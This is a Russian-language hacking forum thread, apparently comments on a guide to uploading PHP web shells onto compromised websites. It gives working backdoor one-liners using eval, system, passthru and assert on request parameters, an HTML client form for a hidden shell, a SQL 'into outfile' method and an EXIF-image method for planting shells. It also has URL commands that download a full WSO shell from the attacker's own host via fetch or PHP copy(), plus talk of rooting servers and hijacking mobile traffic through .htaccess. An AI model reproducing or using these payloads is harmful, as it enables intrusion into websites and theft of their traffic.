скажите залил wso2 шелл, но править .htaccess файл не дает. что можно сделать?? нужно поправить .htaccess для перекачки моб.трафа?? Права 0644
права на файл какие? если не дает я так думаю что прав нет, смотри на ядро..ищи сплоит, рутай----> профит
Открой .htaccess. Скопируй содержимое. Переименуй на 1.htaccess. Создай файл .htaccess, а туда уже Ctrl+V => Свой код => Save => PROFIT!!!11
за то assert выручает))) P.S: На мой взгляд самое оптимальное прятать шел что нить в таком формате <? $_POST['login']($_POST['action']); ?> и написать под нее какой нит скриптик, который в принцепи по логике можно использовать как полноценный шелл (клиентскую часть)...
А вот и скриптик на html HTML: <form action="Путь_к_файлу_с_этим_кодом" method=POST> Команда: <input type=text size=40 name=login><br> Значение: <input type=text size=40 name=action><br> </form> Там где команда например system, а там где значение соответственно ls и тп... также можно radio кнопки заюзать Ну или юзать GET...
Че вы напали на парня? Все такие умные шо пздц, напишите сами статьи, а потом критикуйте. Молодец что написал статью, многим будет полезна. Будьте проще. Peace.
PHP: select 'код мини шела' into outfile '/путь относительно корня сайта/shel.php' данный метод требует файловые привилегии и не слешируемые кавычки, это если через адрессную строку ну и через пхп админ теже привилегии но кавычки там как правило не слешируются... также директория куда будет литься шелл должна быть разрешена для запеси.
также для проверки привилегий "по быстрому" рекомендую просто залить в папку /tmp/ если льётся - то права есть)
Большое спасибо за статью. Все те разрозненные наборы информации, что по крупицам приходилось гуглить, собрано здесь, в одном месте. Статья помогла найти ответы на некоторые вопросы, которые вроде и лежат на поверхности, но вот осознать их получилось только с конкретными примерами синктаксиса в коде, которые можно с удовольствием наблюдать тут. Пиши есчо)
подскажите всё делаю как тут написано 8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём: Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так: Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть <?php eval($_GET[cmd]); ?>, сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе... Подробнее тут делаю фото 123.jpg закачиваю на сайт скрипт сайта меняет ему название но коменты оттаются меняет на 3973819_77116-32x32x.jpg прохажу по пути site.ru/data/cache/2012mar/11/04/3973819_77116-32x32x.jpg?cmd=phpinfo() так как картинка была так и остаётся и так пробывал site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo() вообще ошибка вылезает что я не так делаю ?
ошибка Access forbidden! You don't have permission to access the requested directory. There is either no index document or the directory is read-protected. If you think this is a server error, please contact the webmaster. Error 403 site.ru Sun Mar 11 02:02:31 2012 Apache/2.2.21 (FreeBSD) PHP/5.3.5 with Suhosin-Patch Я ещё новичок в этом а что я там забыл ??? ребят ответе, навидите на путь истенный ))))
Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры. И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида: PHP: <?system($_GET[cmd])?> PHP: <?eval($_GET[cmd])?> PHP: <?passthru($_GET[cmd])?> PHP: <?eval($_REQUEST[cmd])?> PHP: <?passthru($_REQUEST[cmd])?> PHP: <?system($_REQUEST[cmd])?> PHP: <?assert($_GET[cmd])?> Например мы залили <?system($_GET[cmd])?>, тогда PHP: http://уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch; // Узнаем "качалку", если fetch, то PHP: http://уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php // Заливаем полноценный шелл Если мы залили <?assert($_GET[cmd])?>, то PHP: http://уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php"); Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках". Как-то так, в общем.